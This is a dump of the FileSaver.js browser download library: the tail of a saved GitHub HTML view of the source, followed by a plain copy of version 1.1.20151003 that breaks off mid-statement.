        <td id="L166" class="blob-num js-line-number" data-line-number="166"></td>
        <td id="LC166" class="blob-code blob-code-inner js-file-line">					<span class="pl-k">var</span> <span class="pl-en">save</span> <span class="pl-k">=</span> <span class="pl-k">function</span>() {</td>
      </tr>
      <tr>
        <td id="L167" class="blob-num js-line-number" data-line-number="167"></td>
        <td id="LC167" class="blob-code blob-code-inner js-file-line">						dir.getFile(name, create_if_not_found, abortable(<span class="pl-k">function</span>(<span class="pl-smi">file</span>) {</td>
      </tr>
      <tr>
        <td id="L168" class="blob-num js-line-number" data-line-number="168"></td>
        <td id="LC168" class="blob-code blob-code-inner js-file-line">							file.createWriter(abortable(<span class="pl-k">function</span>(<span class="pl-smi">writer</span>) {</td>
      </tr>
      <tr>
        <td id="L169" class="blob-num js-line-number" data-line-number="169"></td>
        <td id="LC169" class="blob-code blob-code-inner js-file-line">								<span class="pl-c1">writer</span>.<span class="pl-en">onwriteend</span> <span class="pl-k">=</span> <span class="pl-k">function</span>(<span class="pl-smi">event</span>) {</td>
      </tr>
      <tr>
        <td id="L170" class="blob-num js-line-number" data-line-number="170"></td>
        <td id="LC170" class="blob-code blob-code-inner js-file-line">									target_view.<span class="pl-c1">location</span>.<span class="pl-c1">href</span> <span class="pl-k">=</span> file.toURL();</td>
      </tr>
      <tr>
        <td id="L171" class="blob-num js-line-number" data-line-number="171"></td>
        <td id="LC171" class="blob-code blob-code-inner js-file-line">									filesaver.<span class="pl-c1">readyState</span> <span class="pl-k">=</span> filesaver.DONE;</td>
      </tr>
      <tr>
        <td id="L172" class="blob-num js-line-number" data-line-number="172"></td>
        <td id="LC172" class="blob-code blob-code-inner js-file-line">									dispatch(filesaver, <span class="pl-s"><span class="pl-pds">&quot;</span>writeend<span class="pl-pds">&quot;</span></span>, <span class="pl-c1">event</span>);</td>
      </tr>
      <tr>
        <td id="L173" class="blob-num js-line-number" data-line-number="173"></td>
        <td id="LC173" class="blob-code blob-code-inner js-file-line">									revoke(file);</td>
      </tr>
      <tr>
        <td id="L174" class="blob-num js-line-number" data-line-number="174"></td>
        <td id="LC174" class="blob-code blob-code-inner js-file-line">								};</td>
      </tr>
      <tr>
        <td id="L175" class="blob-num js-line-number" data-line-number="175"></td>
        <td id="LC175" class="blob-code blob-code-inner js-file-line">								<span class="pl-c1">writer</span>.<span class="pl-en">onerror</span> <span class="pl-k">=</span> <span class="pl-k">function</span>() {</td>
      </tr>
      <tr>
        <td id="L176" class="blob-num js-line-number" data-line-number="176"></td>
        <td id="LC176" class="blob-code blob-code-inner js-file-line">									<span class="pl-k">var</span> error <span class="pl-k">=</span> writer<span class="pl-c1">.error</span>;</td>
      </tr>
      <tr>
        <td id="L177" class="blob-num js-line-number" data-line-number="177"></td>
        <td id="LC177" class="blob-code blob-code-inner js-file-line">									<span class="pl-k">if</span> (error.<span class="pl-c1">code</span> <span class="pl-k">!==</span> error.ABORT_ERR) {</td>
      </tr>
      <tr>
        <td id="L178" class="blob-num js-line-number" data-line-number="178"></td>
        <td id="LC178" class="blob-code blob-code-inner js-file-line">										fs_error();</td>
      </tr>
      <tr>
        <td id="L179" class="blob-num js-line-number" data-line-number="179"></td>
        <td id="LC179" class="blob-code blob-code-inner js-file-line">									}</td>
      </tr>
      <tr>
        <td id="L180" class="blob-num js-line-number" data-line-number="180"></td>
        <td id="LC180" class="blob-code blob-code-inner js-file-line">								};</td>
      </tr>
      <tr>
        <td id="L181" class="blob-num js-line-number" data-line-number="181"></td>
        <td id="LC181" class="blob-code blob-code-inner js-file-line">								<span class="pl-s"><span class="pl-pds">&quot;</span>writestart progress write abort<span class="pl-pds">&quot;</span></span>.<span class="pl-c1">split</span>(<span class="pl-s"><span class="pl-pds">&quot;</span> <span class="pl-pds">&quot;</span></span>).forEach(<span class="pl-k">function</span>(<span class="pl-smi">event</span>) {</td>
      </tr>
      <tr>
        <td id="L182" class="blob-num js-line-number" data-line-number="182"></td>
        <td id="LC182" class="blob-code blob-code-inner js-file-line">									writer[<span class="pl-s"><span class="pl-pds">&quot;</span>on<span class="pl-pds">&quot;</span></span> <span class="pl-k">+</span> <span class="pl-c1">event</span>] <span class="pl-k">=</span> filesaver[<span class="pl-s"><span class="pl-pds">&quot;</span>on<span class="pl-pds">&quot;</span></span> <span class="pl-k">+</span> <span class="pl-c1">event</span>];</td>
      </tr>
      <tr>
        <td id="L183" class="blob-num js-line-number" data-line-number="183"></td>
        <td id="LC183" class="blob-code blob-code-inner js-file-line">								});</td>
      </tr>
      <tr>
        <td id="L184" class="blob-num js-line-number" data-line-number="184"></td>
        <td id="LC184" class="blob-code blob-code-inner js-file-line">								writer.<span class="pl-c1">write</span>(blob);</td>
      </tr>
      <tr>
        <td id="L185" class="blob-num js-line-number" data-line-number="185"></td>
        <td id="LC185" class="blob-code blob-code-inner js-file-line">								<span class="pl-c1">filesaver</span>.<span class="pl-en">abort</span> <span class="pl-k">=</span> <span class="pl-k">function</span>() {</td>
      </tr>
      <tr>
        <td id="L186" class="blob-num js-line-number" data-line-number="186"></td>
        <td id="LC186" class="blob-code blob-code-inner js-file-line">									writer.<span class="pl-c1">abort</span>();</td>
      </tr>
      <tr>
        <td id="L187" class="blob-num js-line-number" data-line-number="187"></td>
        <td id="LC187" class="blob-code blob-code-inner js-file-line">									filesaver.<span class="pl-c1">readyState</span> <span class="pl-k">=</span> filesaver.DONE;</td>
      </tr>
      <tr>
        <td id="L188" class="blob-num js-line-number" data-line-number="188"></td>
        <td id="LC188" class="blob-code blob-code-inner js-file-line">								};</td>
      </tr>
      <tr>
        <td id="L189" class="blob-num js-line-number" data-line-number="189"></td>
        <td id="LC189" class="blob-code blob-code-inner js-file-line">								filesaver.<span class="pl-c1">readyState</span> <span class="pl-k">=</span> filesaver.WRITING;</td>
      </tr>
      <tr>
        <td id="L190" class="blob-num js-line-number" data-line-number="190"></td>
        <td id="LC190" class="blob-code blob-code-inner js-file-line">							}), fs_error);</td>
      </tr>
      <tr>
        <td id="L191" class="blob-num js-line-number" data-line-number="191"></td>
        <td id="LC191" class="blob-code blob-code-inner js-file-line">						}), fs_error);</td>
      </tr>
      <tr>
        <td id="L192" class="blob-num js-line-number" data-line-number="192"></td>
        <td id="LC192" class="blob-code blob-code-inner js-file-line">					};</td>
      </tr>
      <tr>
        <td id="L193" class="blob-num js-line-number" data-line-number="193"></td>
        <td id="LC193" class="blob-code blob-code-inner js-file-line">					dir.getFile(name, {create<span class="pl-k">:</span> <span class="pl-c1">false</span>}, abortable(<span class="pl-k">function</span>(<span class="pl-smi">file</span>) {</td>
      </tr>
      <tr>
        <td id="L194" class="blob-num js-line-number" data-line-number="194"></td>
        <td id="LC194" class="blob-code blob-code-inner js-file-line">						<span class="pl-c">// delete file if it already exists</span></td>
      </tr>
      <tr>
        <td id="L195" class="blob-num js-line-number" data-line-number="195"></td>
        <td id="LC195" class="blob-code blob-code-inner js-file-line">						file.<span class="pl-c1">remove</span>();</td>
      </tr>
      <tr>
        <td id="L196" class="blob-num js-line-number" data-line-number="196"></td>
        <td id="LC196" class="blob-code blob-code-inner js-file-line">						save();</td>
      </tr>
      <tr>
        <td id="L197" class="blob-num js-line-number" data-line-number="197"></td>
        <td id="LC197" class="blob-code blob-code-inner js-file-line">					}), abortable(<span class="pl-k">function</span>(<span class="pl-smi">ex</span>) {</td>
      </tr>
      <tr>
        <td id="L198" class="blob-num js-line-number" data-line-number="198"></td>
        <td id="LC198" class="blob-code blob-code-inner js-file-line">						<span class="pl-k">if</span> (ex.<span class="pl-c1">code</span> <span class="pl-k">===</span> ex.<span class="pl-c1">NOT_FOUND_ERR</span>) {</td>
      </tr>
      <tr>
        <td id="L199" class="blob-num js-line-number" data-line-number="199"></td>
        <td id="LC199" class="blob-code blob-code-inner js-file-line">							save();</td>
      </tr>
      <tr>
        <td id="L200" class="blob-num js-line-number" data-line-number="200"></td>
        <td id="LC200" class="blob-code blob-code-inner js-file-line">						} <span class="pl-k">else</span> {</td>
      </tr>
      <tr>
        <td id="L201" class="blob-num js-line-number" data-line-number="201"></td>
        <td id="LC201" class="blob-code blob-code-inner js-file-line">							fs_error();</td>
      </tr>
      <tr>
        <td id="L202" class="blob-num js-line-number" data-line-number="202"></td>
        <td id="LC202" class="blob-code blob-code-inner js-file-line">						}</td>
      </tr>
      <tr>
        <td id="L203" class="blob-num js-line-number" data-line-number="203"></td>
        <td id="LC203" class="blob-code blob-code-inner js-file-line">					}));</td>
      </tr>
      <tr>
        <td id="L204" class="blob-num js-line-number" data-line-number="204"></td>
        <td id="LC204" class="blob-code blob-code-inner js-file-line">				}), fs_error);</td>
      </tr>
      <tr>
        <td id="L205" class="blob-num js-line-number" data-line-number="205"></td>
        <td id="LC205" class="blob-code blob-code-inner js-file-line">			}), fs_error);</td>
      </tr>
      <tr>
        <td id="L206" class="blob-num js-line-number" data-line-number="206"></td>
        <td id="LC206" class="blob-code blob-code-inner js-file-line">		}</td>
      </tr>
      <tr>
        <td id="L207" class="blob-num js-line-number" data-line-number="207"></td>
        <td id="LC207" class="blob-code blob-code-inner js-file-line">		, FS_proto <span class="pl-k">=</span> FileSaver.<span class="pl-c1">prototype</span></td>
      </tr>
      <tr>
        <td id="L208" class="blob-num js-line-number" data-line-number="208"></td>
        <td id="LC208" class="blob-code blob-code-inner js-file-line">		, <span class="pl-en">saveAs</span> <span class="pl-k">=</span> <span class="pl-k">function</span>(<span class="pl-smi">blob</span>, <span class="pl-smi">name</span>) {</td>
      </tr>
      <tr>
        <td id="L209" class="blob-num js-line-number" data-line-number="209"></td>
        <td id="LC209" class="blob-code blob-code-inner js-file-line">			<span class="pl-k">return</span> <span class="pl-k">new</span> <span class="pl-en">FileSaver</span>(blob, name);</td>
      </tr>
      <tr>
        <td id="L210" class="blob-num js-line-number" data-line-number="210"></td>
        <td id="LC210" class="blob-code blob-code-inner js-file-line">		}</td>
      </tr>
      <tr>
        <td id="L211" class="blob-num js-line-number" data-line-number="211"></td>
        <td id="LC211" class="blob-code blob-code-inner js-file-line">	;</td>
      </tr>
      <tr>
        <td id="L212" class="blob-num js-line-number" data-line-number="212"></td>
        <td id="LC212" class="blob-code blob-code-inner js-file-line">	<span class="pl-c">// IE 10+ (native saveAs)</span></td>
      </tr>
      <tr>
        <td id="L213" class="blob-num js-line-number" data-line-number="213"></td>
        <td id="LC213" class="blob-code blob-code-inner js-file-line">	<span class="pl-k">if</span> (<span class="pl-k">typeof</span> <span class="pl-c1">navigator</span> <span class="pl-k">!==</span> <span class="pl-s"><span class="pl-pds">&quot;</span>undefined<span class="pl-pds">&quot;</span></span> <span class="pl-k">&amp;&amp;</span> <span class="pl-c1">navigator</span>.msSaveOrOpenBlob) {</td>
      </tr>
      <tr>
        <td id="L214" class="blob-num js-line-number" data-line-number="214"></td>
        <td id="LC214" class="blob-code blob-code-inner js-file-line">		<span class="pl-k">return</span> <span class="pl-k">function</span>(<span class="pl-smi">blob</span>, <span class="pl-smi">name</span>) {</td>
      </tr>
      <tr>
        <td id="L215" class="blob-num js-line-number" data-line-number="215"></td>
        <td id="LC215" class="blob-code blob-code-inner js-file-line">			<span class="pl-k">return</span> <span class="pl-c1">navigator</span>.msSaveOrOpenBlob(auto_bom(blob), name);</td>
      </tr>
      <tr>
        <td id="L216" class="blob-num js-line-number" data-line-number="216"></td>
        <td id="LC216" class="blob-code blob-code-inner js-file-line">		};</td>
      </tr>
      <tr>
        <td id="L217" class="blob-num js-line-number" data-line-number="217"></td>
        <td id="LC217" class="blob-code blob-code-inner js-file-line">	}</td>
      </tr>
      <tr>
        <td id="L218" class="blob-num js-line-number" data-line-number="218"></td>
        <td id="LC218" class="blob-code blob-code-inner js-file-line">
</td>
      </tr>
      <tr>
        <td id="L219" class="blob-num js-line-number" data-line-number="219"></td>
        <td id="LC219" class="blob-code blob-code-inner js-file-line">	<span class="pl-c1">FS_proto</span>.<span class="pl-en">abort</span> <span class="pl-k">=</span> <span class="pl-k">function</span>() {</td>
      </tr>
      <tr>
        <td id="L220" class="blob-num js-line-number" data-line-number="220"></td>
        <td id="LC220" class="blob-code blob-code-inner js-file-line">		<span class="pl-k">var</span> filesaver <span class="pl-k">=</span> <span class="pl-v">this</span>;</td>
      </tr>
      <tr>
        <td id="L221" class="blob-num js-line-number" data-line-number="221"></td>
        <td id="LC221" class="blob-code blob-code-inner js-file-line">		filesaver.<span class="pl-c1">readyState</span> <span class="pl-k">=</span> filesaver.DONE;</td>
      </tr>
      <tr>
        <td id="L222" class="blob-num js-line-number" data-line-number="222"></td>
        <td id="LC222" class="blob-code blob-code-inner js-file-line">		dispatch(filesaver, <span class="pl-s"><span class="pl-pds">&quot;</span>abort<span class="pl-pds">&quot;</span></span>);</td>
      </tr>
      <tr>
        <td id="L223" class="blob-num js-line-number" data-line-number="223"></td>
        <td id="LC223" class="blob-code blob-code-inner js-file-line">	};</td>
      </tr>
      <tr>
        <td id="L224" class="blob-num js-line-number" data-line-number="224"></td>
        <td id="LC224" class="blob-code blob-code-inner js-file-line">	FS_proto.<span class="pl-c1">readyState</span> <span class="pl-k">=</span> FS_proto.INIT <span class="pl-k">=</span> <span class="pl-c1">0</span>;</td>
      </tr>
      <tr>
        <td id="L225" class="blob-num js-line-number" data-line-number="225"></td>
        <td id="LC225" class="blob-code blob-code-inner js-file-line">	FS_proto.WRITING <span class="pl-k">=</span> <span class="pl-c1">1</span>;</td>
      </tr>
      <tr>
        <td id="L226" class="blob-num js-line-number" data-line-number="226"></td>
        <td id="LC226" class="blob-code blob-code-inner js-file-line">	FS_proto.DONE <span class="pl-k">=</span> <span class="pl-c1">2</span>;</td>
      </tr>
      <tr>
        <td id="L227" class="blob-num js-line-number" data-line-number="227"></td>
        <td id="LC227" class="blob-code blob-code-inner js-file-line">
</td>
      </tr>
      <tr>
        <td id="L228" class="blob-num js-line-number" data-line-number="228"></td>
        <td id="LC228" class="blob-code blob-code-inner js-file-line">	FS_proto<span class="pl-c1">.error</span> <span class="pl-k">=</span></td>
      </tr>
      <tr>
        <td id="L229" class="blob-num js-line-number" data-line-number="229"></td>
        <td id="LC229" class="blob-code blob-code-inner js-file-line">	FS_proto.onwritestart <span class="pl-k">=</span></td>
      </tr>
      <tr>
        <td id="L230" class="blob-num js-line-number" data-line-number="230"></td>
        <td id="LC230" class="blob-code blob-code-inner js-file-line">	FS_proto.onprogress <span class="pl-k">=</span></td>
      </tr>
      <tr>
        <td id="L231" class="blob-num js-line-number" data-line-number="231"></td>
        <td id="LC231" class="blob-code blob-code-inner js-file-line">	FS_proto.onwrite <span class="pl-k">=</span></td>
      </tr>
      <tr>
        <td id="L232" class="blob-num js-line-number" data-line-number="232"></td>
        <td id="LC232" class="blob-code blob-code-inner js-file-line">	FS_proto.onabort <span class="pl-k">=</span></td>
      </tr>
      <tr>
        <td id="L233" class="blob-num js-line-number" data-line-number="233"></td>
        <td id="LC233" class="blob-code blob-code-inner js-file-line">	FS_proto.onerror <span class="pl-k">=</span></td>
      </tr>
      <tr>
        <td id="L234" class="blob-num js-line-number" data-line-number="234"></td>
        <td id="LC234" class="blob-code blob-code-inner js-file-line">	FS_proto.onwriteend <span class="pl-k">=</span></td>
      </tr>
      <tr>
        <td id="L235" class="blob-num js-line-number" data-line-number="235"></td>
        <td id="LC235" class="blob-code blob-code-inner js-file-line">		<span class="pl-c1">null</span>;</td>
      </tr>
      <tr>
        <td id="L236" class="blob-num js-line-number" data-line-number="236"></td>
        <td id="LC236" class="blob-code blob-code-inner js-file-line">
</td>
      </tr>
      <tr>
        <td id="L237" class="blob-num js-line-number" data-line-number="237"></td>
        <td id="LC237" class="blob-code blob-code-inner js-file-line">	<span class="pl-k">return</span> saveAs;</td>
      </tr>
      <tr>
        <td id="L238" class="blob-num js-line-number" data-line-number="238"></td>
        <td id="LC238" class="blob-code blob-code-inner js-file-line">}(</td>
      </tr>
      <tr>
        <td id="L239" class="blob-num js-line-number" data-line-number="239"></td>
        <td id="LC239" class="blob-code blob-code-inner js-file-line">	   <span class="pl-k">typeof</span> self <span class="pl-k">!==</span> <span class="pl-s"><span class="pl-pds">&quot;</span>undefined<span class="pl-pds">&quot;</span></span> <span class="pl-k">&amp;&amp;</span> self</td>
      </tr>
      <tr>
        <td id="L240" class="blob-num js-line-number" data-line-number="240"></td>
        <td id="LC240" class="blob-code blob-code-inner js-file-line">	<span class="pl-k">||</span> <span class="pl-k">typeof</span> <span class="pl-c1">window</span> <span class="pl-k">!==</span> <span class="pl-s"><span class="pl-pds">&quot;</span>undefined<span class="pl-pds">&quot;</span></span> <span class="pl-k">&amp;&amp;</span> <span class="pl-c1">window</span></td>
      </tr>
      <tr>
        <td id="L241" class="blob-num js-line-number" data-line-number="241"></td>
        <td id="LC241" class="blob-code blob-code-inner js-file-line">	<span class="pl-k">||</span> <span class="pl-v">this</span>.<span class="pl-c1">content</span></td>
      </tr>
      <tr>
        <td id="L242" class="blob-num js-line-number" data-line-number="242"></td>
        <td id="LC242" class="blob-code blob-code-inner js-file-line">));</td>
      </tr>
      <tr>
        <td id="L243" class="blob-num js-line-number" data-line-number="243"></td>
        <td id="LC243" class="blob-code blob-code-inner js-file-line"><span class="pl-c">// `self` is undefined in Firefox for Android content script context</span></td>
      </tr>
      <tr>
        <td id="L244" class="blob-num js-line-number" data-line-number="244"></td>
        <td id="LC244" class="blob-code blob-code-inner js-file-line"><span class="pl-c">// while `this` is nsIContentFrameMessageManager</span></td>
      </tr>
      <tr>
        <td id="L245" class="blob-num js-line-number" data-line-number="245"></td>
        <td id="LC245" class="blob-code blob-code-inner js-file-line"><span class="pl-c">// with an attribute `content` that corresponds to the window</span></td>
      </tr>
      <tr>
        <td id="L246" class="blob-num js-line-number" data-line-number="246"></td>
        <td id="LC246" class="blob-code blob-code-inner js-file-line">
</td>
      </tr>
      <tr>
        <td id="L247" class="blob-num js-line-number" data-line-number="247"></td>
        <td id="LC247" class="blob-code blob-code-inner js-file-line"><span class="pl-k">if</span> (<span class="pl-k">typeof</span> <span class="pl-c1">module</span> <span class="pl-k">!==</span> <span class="pl-s"><span class="pl-pds">&quot;</span>undefined<span class="pl-pds">&quot;</span></span> <span class="pl-k">&amp;&amp;</span> <span class="pl-c1">module</span>.exports) {</td>
      </tr>
      <tr>
        <td id="L248" class="blob-num js-line-number" data-line-number="248"></td>
        <td id="LC248" class="blob-code blob-code-inner js-file-line">  <span class="pl-c1">module</span>.exports.saveAs <span class="pl-k">=</span> saveAs;</td>
      </tr>
      <tr>
        <td id="L249" class="blob-num js-line-number" data-line-number="249"></td>
        <td id="LC249" class="blob-code blob-code-inner js-file-line">} <span class="pl-k">else</span> <span class="pl-k">if</span> ((<span class="pl-k">typeof</span> define <span class="pl-k">!==</span> <span class="pl-s"><span class="pl-pds">&quot;</span>undefined<span class="pl-pds">&quot;</span></span> <span class="pl-k">&amp;&amp;</span> define <span class="pl-k">!==</span> <span class="pl-c1">null</span>) <span class="pl-k">&amp;&amp;</span> (define.amd <span class="pl-k">!=</span> <span class="pl-c1">null</span>)) {</td>
      </tr>
      <tr>
        <td id="L250" class="blob-num js-line-number" data-line-number="250"></td>
        <td id="LC250" class="blob-code blob-code-inner js-file-line">  define([], <span class="pl-k">function</span>() {</td>
      </tr>
      <tr>
        <td id="L251" class="blob-num js-line-number" data-line-number="251"></td>
        <td id="LC251" class="blob-code blob-code-inner js-file-line">    <span class="pl-k">return</span> saveAs;</td>
      </tr>
      <tr>
        <td id="L252" class="blob-num js-line-number" data-line-number="252"></td>
        <td id="LC252" class="blob-code blob-code-inner js-file-line">  });</td>
      </tr>
      <tr>
        <td id="L253" class="blob-num js-line-number" data-line-number="253"></td>
        <td id="LC253" class="blob-code blob-code-inner js-file-line">}</td>
      </tr>
</table>

  </div>

</div>

<a href="#jump-to-line" rel="facebox[.linejump]" data-hotkey="l" style="display:none">Jump to Line</a>
<div id="jump-to-line" style="display:none">
  <form accept-charset="UTF-8" action="" class="js-jump-to-line-form" method="get"><div style="margin:0;padding:0;display:inline"><input name="utf8" type="hidden" value="&#x2713;" /></div>
    <input class="linejump-input js-jump-to-line-field" type="text" placeholder="Jump to line&hellip;" autofocus>
    <button type="submit" class="btn">Go</button>
</form></div>

        </div>

      </div><!-- /.repo-container -->
      <div class="modal-backdrop"></div>
    </div><!-- /.container -->
  </div><!-- /.site -->


    </div><!-- /.wrapper -->

      <div class="container">
  <div class="site-footer" role="contentinfo">
    <ul class="site-footer-links right">
        <li><a href="https://status.github.com/" data-ga-click="Footer, go to status, text:status">Status</a></li>
      <li><a href="https://developer.github.com" data-ga-click="Footer, go to api, text:api">API</a></li>
      <li><a href="https://training.github.com" data-ga-click="Footer, go to training, text:training">Training</a></li>
      <li><a href="https://shop.github.com" data-ga-click="Footer, go to shop, text:shop">Shop</a></li>
        <li><a href="https://github.com/blog" data-ga-click="Footer, go to blog, text:blog">Blog</a></li>
        <li><a href="https://github.com/about" data-ga-click="Footer, go to about, text:about">About</a></li>

    </ul>

    <a href="https://github.com" aria-label="Homepage">
      <span class="mega-octicon octicon-mark-github" title="GitHub"></span>
</a>
    <ul class="site-footer-links">
      <li>&copy; 2015 <span title="0.03993s from github-fe124-cp1-prd.iad.github.net">GitHub</span>, Inc.</li>
        <li><a href="https://github.com/site/terms" data-ga-click="Footer, go to terms, text:terms">Terms</a></li>
        <li><a href="https://github.com/site/privacy" data-ga-click="Footer, go to privacy, text:privacy">Privacy</a></li>
        <li><a href="https://github.com/security" data-ga-click="Footer, go to security, text:security">Security</a></li>
        <li><a href="https://github.com/contact" data-ga-click="Footer, go to contact, text:contact">Contact</a></li>
    </ul>
  </div>
</div>


    <div class="fullscreen-overlay js-fullscreen-overlay" id="fullscreen_overlay">
  <div class="fullscreen-container js-suggester-container">
    <div class="textarea-wrap">
      <textarea name="fullscreen-contents" id="fullscreen-contents" class="fullscreen-contents js-fullscreen-contents" placeholder=""></textarea>
      <div class="suggester-container">
        <div class="suggester fullscreen-suggester js-suggester js-navigation-container"></div>
      </div>
    </div>
  </div>
  <div class="fullscreen-sidebar">
    <a href="#" class="exit-fullscreen js-exit-fullscreen tooltipped tooltipped-w" aria-label="Exit Zen Mode">
      <span class="mega-octicon octicon-screen-normal"></span>
    </a>
    <a href="#" class="theme-switcher js-theme-switcher tooltipped tooltipped-w"
      aria-label="Switch themes">
      <span class="octicon octicon-color-mode"></span>
    </a>
  </div>
</div>



    

    <div id="ajax-error-message" class="flash flash-error">
      <span class="octicon octicon-alert"></span>
      <a href="#" class="octicon octicon-x flash-close js-ajax-error-dismiss" aria-label="Dismiss error"></a>
      Something went wrong with that request. Please try again.
    </div>


      <script crossorigin="anonymous" src="https://assets-cdn.github.com/assets/frameworks-447ce66a36506ebddc8e84b4e32a77f6062f3d3482e77dd21a77a01f0643ad98.js"></script>
      <script async="async" crossorigin="anonymous" src="https://assets-cdn.github.com/assets/github/index-991c6e3570dd4bec2717ccbefb4d38e93871d54a7038c010fd30e8932aa10875.js"></script>
      
      
  </body>
</html>



==> results/VENN-Diag/FileSaver2.js <==
/* FileSaver.js
 * A saveAs() FileSaver implementation.
 * 1.1.20151003
 *
 * By Eli Grey, http://eligrey.com
 * License: MIT
 *   See https://github.com/eligrey/FileSaver.js/blob/master/LICENSE.md
 */

/*global self */
/*jslint bitwise: true, indent: 4, laxbreak: true, laxcomma: true, smarttabs: true, plusplus: true */

/*! @source http://purl.eligrey.com/github/FileSaver.js/blob/master/FileSaver.js */

var saveAs = saveAs || (function(view) {
	"use strict";
	// IE <10 is explicitly unsupported
	if (typeof navigator !== "undefined" && /MSIE [1-9]\./.test(navigator.userAgent)) {
		return;
	}
	var
		  doc = view.document
		  // only get URL when necessary in case Blob.js hasn't overridden it yet
		, get_URL = function() {
			return view.URL || view.webkitURL || view;
		}
		, save_link = doc.createElementNS("http://www.w3.org/1999/xhtml", "a")
		, can_use_save_link = "download" in save_link
		, click = function(node) {
			var event = new MouseEvent("click");
			node.dispatchEvent(event);
		}
		, is_safari = /Version\/[\d\.]+.*Safari/.test(navigator.userAgent)
		, webkit_req_fs = view.webkitRequestFileSystem
		, req_fs = view.requestFileSystem || webkit_req_fs || view.mozRequestFileSystem
		, throw_outside = function(ex) {
			(view.setImmediate || view.setTimeout)(function() {
				throw ex;
			}, 0);
		}
		, force_saveable_type = "application/octet-stream"
		, fs_min_size = 0
		// See https://code.google.com/p/chromium/issues/detail?id=375297#c7 and
		// https://github.com/eligrey/FileSaver.js/commit/485930a#commitcomment-8768047
		// for the reasoning behind the timeout and revocation flow
		, arbitrary_revoke_timeout = 500 // in ms
		, revoke = function(file) {
			var revoker = function() {
				if (typeof file === "string") { // file is an object URL
					get_URL().revokeObjectURL(file);
				} else { // file is a File
					file.remove();
				}
			};
			if (view.chrome) {
				revoker();
			} else {
				setTimeout(revoker, arbitrary_revoke_timeout);
			}
		}
		, dispatch = function(filesaver, event_types, event) {
			event_types = [].concat(event_types);
			var i = event_types.length;
			while (i--) {
				var listener = filesaver["on" + event_types[i]];
				if (typeof listener === "function") {
					try {
						listener.call(filesaver, event || filesaver);
					} catch (ex) {
						throw_outside(ex);
					}
				}
			}
		}
		, auto_bom = function(blob) {
			// prepend BOM for UTF-8 XML and text/* types (including HTML)
			if (/^\s*(?:text\/\S*|application\/xml|\S*\/\S*\+xml)\s*;.*charset\s*=\s*utf-8/i.test(blob.type)) {
				return new Blob(["\ufeff", blob], {type: blob.type});
			}
			return blob;
		}
		, FileSaver = function(blob, name, no_auto_bom) {
			if (!no_auto_bom) {
				blob = auto_bom(blob);
			}
			// First try a.download, then web filesystem, then object URLs
			var
				  filesaver = this
				, type = blob.type
				, blob_changed = false
				, object_url
				, target_view
				, dispatch_all = function() {
					dispatch(filesaver, "writestart progress write writeend".split(" "));
				}
				// on any filesys errors revert to saving with object URLs
				, fs_error = function() {
					if (target_view && is_safari && typeof FileReader !== "undefined") {
						// Safari doesn't allow downloading of blob urls
						var reader = new FileReader();
						reader.onloadend = function() {
							var base64Data = reader.result;
							target_view.location.href = "data:attachment/file" + base64Data.slice(base64Data.search(/[,;]/));
							filesaver.readyState = filesaver.DONE;
							dispatch_all();
						};
						reader.readAsDataURL(blob);
						filesaver.readyState = filesaver.INIT;
						return;
					}
					// don't create more object URLs than needed
					if (blob_changed || !object_url) {
						object_url = get_URL().createObjectURL(blob);
					}
					if (target_view) {
						target_view.location.href = object_url;
					} else {
						var new_tab = view.open(object_url, "_blank");
						if (new_tab == undefined && is_safari) {
							//Apple do not allow window.open, see http://bit.ly/1kZffRI
							view.location.href = object_url
						}
					}
					filesaver.readyState = filesaver.DONE;
					dispatch_all();
					revoke(object_url);
				}
				, abortable = function(func) {
					return function() {
						if (filesaver.readyState !== filesaver.DONE) {
							return func.apply(this, arguments);
						}
					};
				}
				, create_if_not_found = {create: true, exclusive: false}
				, slice
			;
			filesaver.readyState = filesaver.INIT;
			if (!name) {
				name = "download";
			}
			if (can_use_save_link) {
				object_url = get_URL().createObjectURL(blob);
				save_link.href = object_url;
				save_link.download = name;
				setTimeout(function() {
					click(save_link);
					dispatch_all();
					revoke(object_url);
					filesaver.readyState = filesaver.DONE;
				});
				return;
			}
			// Object and web filesystem URLs have a problem saving in Google Chrome when
			// viewed in a tab, so I force save with application/octet-stream
			// http://code.google.com/p/chromium/issues/detail?id=91158
			// Update: Google errantly closed 91158, I submitted it again:
			// https://code.google.com/p/chromium/issues/detail?id=389642
			if (view.chrome && type && type !== force_saveable_type) {
				slice = blob.slice || blob.webkitSlice;
				blob = slice.call(blob, 0, blob.size, force_saveable_type);
				blob_changed = true;
			}
			// Since I can't be sure that the guessed media type will trigger a download
			// in WebKit, I append .download to the filename.
			// https://bugs.webkit.org/show_bug.cgi?id=65440
			if (webkit_req_fs && name !== "download") {
				name += ".download";
			}
			if (type === force_saveable_type || webkit_req_fs) {
				target_view = view;
			}
			if (!req_fs) {
				fs_error();
				return;
			}
			fs_min_size += blob.size;
			req_fs(view.TEMPORARY, fs_min_size, abortable(function(fs) {
				fs.root.getDirectory("saved", create_if_not_found, abortable(function(dir) {
					var save = function() {
						dir.getFile(name, create_if_not_found, abortable(function(file) {
							file.createWriter(abortable(function(writer) {
								writer.onwriteend = function(event) {
									target_view.location.href = file.toURL();
									filesaver.readyState = filesaver.DONE;
									dispatch(filesaver, "writeend", event);
									revoke(file);
								};
								writer.onerror = function() {
									var error = writer.error;
									if (error.code !== error.ABORT_ERR) {
										fs_error();
									}
								};
								"writestart progress write abort".split(" ").forEach(function(event) {
									writer["on" + event] = filesaver["on" + event];
								});
								writer.write(blob);
								filesaver.abort = function() {
									writer.abort();
									filesaver.readyState = filesaver.DONE;
								};
								filesaver.readyState = filesaver.WRITING;
							}), fs_error);
						}), fs_error);
					};
					dir.getFile(name, {create: false}, abortable(function(file) {
						// delete file if it already exists
						file.remove();
						save();
					}), abortable(function(ex) {
						if (ex.code === ex.NOT_FOUND_ERR) {
							save();
						} else {
							fs_error();
						}
					}));
				}), fs_error);
			}), fs_error);
		}
		, FS_proto = FileSaver.prototype
		, saveAs = function(blob, name, no_auto_bom) {
			return new FileSaver(blob, name, no_auto_bom);
		}
	;
	// IE 10+ (native saveAs)
	if (typeof navigator !== "undefined" && navigator.msSaveOrOpenBlob) {
		return function(blob, name, no_auto_bom) {
			if (!no_auto_bom) {
				blob = auto_bom(blob);
			}
			return navigator.msSaveOrOpenBlob(blob, name || "download");
		};
	}

	FS_proto.abort = function() {
		var filesaver = this;
		filesaver.readyState = filesaver.DONE;
		dispatch(filesaver, "abort");
	};
	FS_proto.readyState = FS_proto.INIT = 0;
	FS_proto.WRITING = 1;
	FS_proto.DONE = 2;

	FS_proto.error =
	FS_proto.onwritestart =
	FS_proto.onprogress =
	FS_proto.onwrite =
	FS_proto.onabort =
